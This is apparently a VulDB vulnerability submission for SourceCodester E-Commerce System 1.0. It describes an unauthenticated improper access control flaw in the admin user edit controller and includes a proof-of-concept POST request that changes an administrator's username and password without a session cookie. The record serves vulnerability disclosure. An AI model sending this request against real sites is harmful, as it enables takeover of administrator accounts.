| Title | E-Commerce System Improper Access Control |
|---|
| Description | An Improper Access Control has been discovered in E-Commerce System, remote and unauthorized attackers could change the administrator user's name and password without authentication when the USERID is correct.
POC below:
POST /ecommerce/admin/user/controller.php?action=edit HTTP/1.1
*********************HEADER WITHOUT COOKIE********************************
USERID=127&deptid=&U_NAME=foo&deptid=&U_USERNAME=craig&deptid=&U_PASS=foo1234&U_ROLE=Administrator&save=
then the user craig's password will be set to 'foo1234' |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/20/2023 08:57 (3 years ago) |
|---|
| Moderation | 03/22/2023 10:59 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223550 [SourceCodester E-Commerce System 1.0 Username controller.php?action=edit USERID access control] |
|---|
| Points | 20 |
|---|